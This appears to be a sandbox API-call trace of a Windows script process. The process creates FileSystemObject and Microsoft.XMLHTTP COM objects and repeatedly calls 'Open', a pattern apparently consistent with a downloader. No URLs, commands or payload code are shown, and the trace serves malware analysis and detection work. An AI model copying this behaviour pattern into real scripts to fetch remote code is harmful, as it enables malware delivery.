	[0745.301] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0745.301] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0745.301] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0745.301] ??2@YAPEAX_K@Z () returned 0x62f350
	[0745.301] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0745.301] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0745.301] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0745.301] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0745.301] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0745.301] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0745.301] SysStringLen (param_1=0x0) returned 0x0
	[0745.302] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0745.305] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0745.305] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0745.305] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0745.305] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0745.305] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0745.306] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0749.419] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0749.419] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0749.420] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0749.421] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0749.421] SysStringLen (param_1=0x0) returned 0x0
	[0749.421] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0749.421] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0749.421] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0749.421] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0749.421] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0749.421] ??2@YAPEAX_K@Z () returned 0x62f310
	[0749.422] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0749.422] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0749.422] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0749.422] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0749.422] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0749.422] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0749.422] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0749.425] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0749.425] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0749.425] SysStringLen (param_1=0x0) returned 0x0
	[0749.425] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0749.425] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0749.425] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0749.425] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0749.425] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72d8) returned 0x0
	[0749.425] ??2@YAPEAX_K@Z () returned 0x62f330
	[0749.425] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72d8, pUnkSite=0x62f330) 
	[0749.426] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0749.426] XMLHTTPRequest:IUnknown:Release (This=0x49c72d8) returned 0x0
	[0749.426] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0749.426] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0749.426] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0749.426] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0749.426] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0749.426] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0749.426] SysStringLen (param_1=0x0) returned 0x0
	[0749.426] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0749.427] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0749.427] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0749.427] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0749.427] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0749.429] ??2@YAPEAX_K@Z () returned 0x62f310
	[0749.429] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f310) 
	[0749.429] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0749.429] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0749.429] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0749.429] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0749.430] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0749.430] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0749.430] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0749.430] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0749.430] SysStringLen (param_1=0x0) returned 0x0
	[0749.430] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0749.430] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0749.430] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0749.430] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0749.430] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72d8) returned 0x0
	[0749.430] ??2@YAPEAX_K@Z () returned 0x62f330
	[0749.431] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72d8, pUnkSite=0x62f330) 
	[0749.431] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0749.431] XMLHTTPRequest:IUnknown:Release (This=0x49c72d8) returned 0x0
	[0749.431] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0749.431] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0749.431] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0749.431] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0749.431] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0749.431] longjmp () 
	[0749.431] longjmp () 
	[0749.432] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0749.432] SysStringLen (param_1=0x0) returned 0x0
	[0749.432] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0749.432] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0749.432] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0749.432] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0749.432] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0749.432] ??2@YAPEAX_K@Z () returned 0x62f310
	[0749.432] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f310) 
	[0749.432] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0749.432] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0749.432] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0749.432] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0749.433] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0749.433] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0749.433] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0749.433] longjmp () 
	[0749.433] longjmp () 
	[0749.433] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0749.433] SysStringLen (param_1=0x0) returned 0x0
